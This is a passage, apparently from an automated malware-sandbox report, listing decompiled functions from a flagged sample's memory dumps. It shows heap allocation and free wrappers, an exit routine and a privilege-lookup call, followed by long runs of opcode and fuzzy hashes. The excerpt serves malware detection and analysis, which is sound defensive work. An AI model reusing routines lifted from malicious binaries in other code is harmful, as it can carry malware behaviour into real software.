                                                                                                                                                                • Opcode ID: 6caf7123e9a08876ca4bb4410dc58b37d4485cf89a5253c63b7ed200a92544a7
                                                                                                                                                                • Instruction ID: 15caf4c3846399f6af7b9f6682e7d5812ef634fc214158c6e5ae4892ece4b085
                                                                                                                                                                • Opcode Fuzzy Hash: 6caf7123e9a08876ca4bb4410dc58b37d4485cf89a5253c63b7ed200a92544a7
                                                                                                                                                                • Instruction Fuzzy Hash: D5E022B1200204AFDB14EF68DC44EF3376CAF89364F00428AF90C97782DA31E800CBA8
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 004184C0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                			E004184C0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E00418DB0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                                                                                                                0x004184cf
                                                                                                                                                                0x004184d7
                                                                                                                                                                0x004184ed
                                                                                                                                                                0x004184f1

                                                                                                                                                                APIs
                                                                                                                                                                • RtlFreeHeap.NTDLL(00000060,00408AE3,?,?,00408AE3,00000060,00000000,00000000,?,?,00408AE3,?,00000000), ref: 004184ED
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2229008620.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FreeHeap
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3298025750-0
                                                                                                                                                                • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                                                                • Instruction ID: bd69bb0d8e56be58ea846d441575552e1355d89f45fa104c15060bc9e05e818a
                                                                                                                                                                • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                                                                • Instruction Fuzzy Hash: EDE01AB12002046BDB14DF59DC45EE777ACAF88750F014559BA0857241CA30E9108AF4
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00418480, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                			E00418480(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E00418DB0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                                                                                                                0x00418497
                                                                                                                                                                0x004184ad
                                                                                                                                                                0x004184b1

                                                                                                                                                                APIs
                                                                                                                                                                • RtlAllocateHeap.NTDLL(00413506,?,00413C7F,00413C7F,?,00413506,?,?,?,?,?,00000000,00408AE3,?), ref: 004184AD
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2229008620.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                                                                • Instruction ID: 95874ba5a5537b3d16e5bdcad340c4ef7a657c48911e570d945e23b5f838c0ed
                                                                                                                                                                • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                                                                • Instruction Fuzzy Hash: 7BE012B1200208ABDB14EF99DC41EE777ACAF88654F118559BA085B282CA30F9108AF4
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00418620, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CF92,0040CF92,00000041,00000000,?,00408B55), ref: 00418650
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2229008620.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: LookupPrivilegeValue
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3899507212-0
                                                                                                                                                                • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                                                                • Instruction ID: 1821f594b7a2fedb3326d3670d224aab122327744fc2f581a2e4424e2d02315d
                                                                                                                                                                • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                                                                • Instruction Fuzzy Hash: 2AE01AB12002086BDB10DF49DC85EE737ADAF89650F018159BA0857241C934E8108BF5
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00418500, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                			E00418500(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E00418DB0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                                                                                                                                                                0x00418503
                                                                                                                                                                0x0041851a
                                                                                                                                                                0x00418528

                                                                                                                                                                APIs
                                                                                                                                                                • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 00418528
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2229008620.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExitProcess
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 621844428-0
                                                                                                                                                                • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                                                                • Instruction ID: 9f62bdc44f65d7d9a2483e28fb075f3ff631dd5cfbab79109080827007e6cc43
                                                                                                                                                                • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                                                                • Instruction Fuzzy Hash: 62D012716003147BD620DF99DC85FD7779CDF49750F018069BA1C5B241C931BA0086E5
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Non-executed Functions

                                                                                                                                                                Function 00B426F8, Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2230244380.0000000000B20000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                • Associated: 00000007.00000002.2230238371.0000000000B10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230340833.0000000000C00000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230350054.0000000000C10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230361178.0000000000C14000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230375338.0000000000C17000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230387163.0000000000C20000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230429009.0000000000C80000.00000040.00000001.sdmp Download File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                                                                                                                                                • Instruction ID: 556758cf3d25e7e742c6c8d3afb307d7a2e773bc262d9201ec786c667cb25f98
                                                                                                                                                                • Opcode Fuzzy Hash: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                                                                                                                                                • Instruction Fuzzy Hash: 5BF0FF203240599BCB48EF1C899277A33D5EB94300FA8C0B8B949C7302D6219E00A290
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00B310D0, Relevance: .0, Instructions: 6COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2230244380.0000000000B20000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                • Associated: 00000007.00000002.2230238371.0000000000B10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230340833.0000000000C00000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230350054.0000000000C10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230361178.0000000000C14000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230375338.0000000000C17000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230387163.0000000000C20000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230429009.0000000000C80000.00000040.00000001.sdmp Download File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                                                                                                                                                • Instruction ID: b97e0867cf63cce6a7bd091cca7d2f61d4937398616a74d9d7050cc2a0bd1794
                                                                                                                                                                • Opcode Fuzzy Hash: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                                                                                                                                                • Instruction Fuzzy Hash: E8B01272180540CBE3199718E906F5FB710FB90F00F00C93EA00781C50DA389D3CD446
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00B30060, Relevance: .0, Instructions: 6COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2230244380.0000000000B20000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                • Associated: 00000007.00000002.2230238371.0000000000B10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230340833.0000000000C00000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230350054.0000000000C10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230361178.0000000000C14000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230375338.0000000000C17000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230387163.0000000000C20000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230429009.0000000000C80000.00000040.00000001.sdmp Download File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                                                                                                                                                • Instruction ID: 5a023e870da9c1ddb48dfa425d4b1b106951aaa9a6b60f468992a3f00291b547
                                                                                                                                                                • Opcode Fuzzy Hash: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                                                                                                                                                • Instruction Fuzzy Hash: 5CB012B2100580C7E30D9714DD06B4B7210FB80F00F00893AA10B81861DB7C9A2CD45E
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00B301D4, Relevance: .0, Instructions: 6COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2230244380.0000000000B20000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                • Associated: 00000007.00000002.2230238371.0000000000B10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230340833.0000000000C00000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230350054.0000000000C10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230361178.0000000000C14000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230375338.0000000000C17000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230387163.0000000000C20000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230429009.0000000000C80000.00000040.00000001.sdmp Download File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                                                                                                                                                • Instruction ID: 018f436d7687ff9142db90ebed9d2f0c0dfd000868ccafab48d689f3c6447ef1
                                                                                                                                                                • Opcode Fuzzy Hash: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                                                                                                                                                • Instruction Fuzzy Hash: B2B01272100940C7E359A714ED46B4B7210FB80F01F00C93BA01B81851DB38AA3CDD96
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00B3010C, Relevance: .0, Instructions: 6COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2230244380.0000000000B20000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                • Associated: 00000007.00000002.2230238371.0000000000B10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230340833.0000000000C00000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230350054.0000000000C10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230361178.0000000000C14000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230375338.0000000000C17000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230387163.0000000000C20000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230429009.0000000000C80000.00000040.00000001.sdmp Download File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                                                                                                                                                • Instruction ID: 6f78205b53d22ab4e8c81d7e3ead40d6172b524c4c965a7ad5e52c730ffb8076
                                                                                                                                                                • Opcode Fuzzy Hash: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                                                                                                                                                • Instruction Fuzzy Hash: B8B01273104D40C7E3099714DD16F4FB310FB90F02F00893EA00B81850DA38A92CC846
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00B31148, Relevance: .0, Instructions: 6COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2230244380.0000000000B20000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                • Associated: 00000007.00000002.2230238371.0000000000B10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230340833.0000000000C00000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230350054.0000000000C10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230361178.0000000000C14000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230375338.0000000000C17000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230387163.0000000000C20000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230429009.0000000000C80000.00000040.00000001.sdmp Download File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                                                                                                                                                • Instruction ID: 165250f8074bc0ef9cdc504fa449021ea13c8322197c03fc884fef66fc1cad38
                                                                                                                                                                • Opcode Fuzzy Hash: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                                                                                                                                                • Instruction Fuzzy Hash: 23B01272140580C7E31D9718D906B5B7610FB80F00F008D3AA04781CA1DBB89A2CE44A
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00B2F8CC, Relevance: .0, Instructions: 6COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2230244380.0000000000B20000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                • Associated: 00000007.00000002.2230238371.0000000000B10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230340833.0000000000C00000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230350054.0000000000C10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230361178.0000000000C14000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230375338.0000000000C17000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230387163.0000000000C20000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230429009.0000000000C80000.00000040.00000001.sdmp Download File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                                                                                                                                                                • Instruction ID: b608c8617bc096b37df9be2f0bc93e64f466faa20b7dbfb3ee59c54b4bfc8c85
                                                                                                                                                                • Opcode Fuzzy Hash: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                                                                                                                                                                • Instruction Fuzzy Hash: EBB01275100540C7F304D704D905F4AB311FBD0F04F40893AE40786591D77EAD28C697
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00B31930, Relevance: .0, Instructions: 6COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2230244380.0000000000B20000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                • Associated: 00000007.00000002.2230238371.0000000000B10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230340833.0000000000C00000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230350054.0000000000C10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230361178.0000000000C14000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230375338.0000000000C17000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230387163.0000000000C20000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230429009.0000000000C80000.00000040.00000001.sdmp Download File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
                                                                                                                                                                • Instruction ID: 3aeeca65ea1aaf37b62c9893cb2d02334d47a3b29990fed3fb0e6cbc500f1d8d
                                                                                                                                                                • Opcode Fuzzy Hash: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
                                                                                                                                                                • Instruction Fuzzy Hash: 52B01272100940C7E34AA714DE07B8BB210FBD0F01F00893BA04B85D50D638A92CC546
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00B2F938, Relevance: .0, Instructions: 6COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2230244380.0000000000B20000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                • Associated: 00000007.00000002.2230238371.0000000000B10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230340833.0000000000C00000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230350054.0000000000C10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230361178.0000000000C14000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230375338.0000000000C17000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230387163.0000000000C20000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230429009.0000000000C80000.00000040.00000001.sdmp Download File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
                                                                                                                                                                • Instruction ID: d523cc507bde657408e54325c2dcaf12b60df831943b7985b4c6fe4931788f26
                                                                                                                                                                • Opcode Fuzzy Hash: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
                                                                                                                                                                • Instruction Fuzzy Hash: FCB0927220194087E2099B04D905B477251EBC0B01F408934A50646590DB399928D947
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00B2FAB8, Relevance: .0, Instructions: 6COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2230244380.0000000000B20000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                • Associated: 00000007.00000002.2230238371.0000000000B10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230340833.0000000000C00000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230350054.0000000000C10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230361178.0000000000C14000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230375338.0000000000C17000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230387163.0000000000C20000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230429009.0000000000C80000.00000040.00000001.sdmp Download File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                                                                                                                                • Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
                                                                                                                                                                • Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                                                                                                                                • Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00B2FA20, Relevance: .0, Instructions: 6COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2230244380.0000000000B20000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                • Associated: 00000007.00000002.2230238371.0000000000B10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230340833.0000000000C00000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230350054.0000000000C10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230361178.0000000000C14000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230375338.0000000000C17000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230387163.0000000000C20000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230429009.0000000000C80000.00000040.00000001.sdmp Download File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
                                                                                                                                                                • Instruction ID: 9b5f4fb9875c6876c932e4128e9800c708acc4d40f0b969179b44b3e8b2884d0
                                                                                                                                                                • Opcode Fuzzy Hash: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
                                                                                                                                                                • Instruction Fuzzy Hash: 4FB01272100580C7E30D9714D90AB4B7210FB80F00F00CD3AA00781861DB78DA2CD45A
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00B2FA50, Relevance: .0, Instructions: 6COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2230244380.0000000000B20000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                • Associated: 00000007.00000002.2230238371.0000000000B10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230340833.0000000000C00000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230350054.0000000000C10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230361178.0000000000C14000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230375338.0000000000C17000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230387163.0000000000C20000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230429009.0000000000C80000.00000040.00000001.sdmp Download File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
                                                                                                                                                                • Instruction ID: 2cae8b11bd858d750de1a79d340ce6dfe3ec44f87311ce0e8d0be64a47f0ebf6
                                                                                                                                                                • Opcode Fuzzy Hash: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
                                                                                                                                                                • Instruction Fuzzy Hash: 9BB01272100544C7E349A714DA07B8B7210FB80F00F008D3BA04782851DFB89A2CE986
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00B2FBE8, Relevance: .0, Instructions: 6COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2230244380.0000000000B20000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                • Associated: 00000007.00000002.2230238371.0000000000B10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230340833.0000000000C00000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230350054.0000000000C10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230361178.0000000000C14000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230375338.0000000000C17000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230387163.0000000000C20000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230429009.0000000000C80000.00000040.00000001.sdmp Download File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
                                                                                                                                                                • Instruction ID: 9452a8d0b0f104eb9e4922b1c8778681c83a3ee0f3d85b1ffb0a7dc5c1b1eaf2
                                                                                                                                                                • Opcode Fuzzy Hash: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
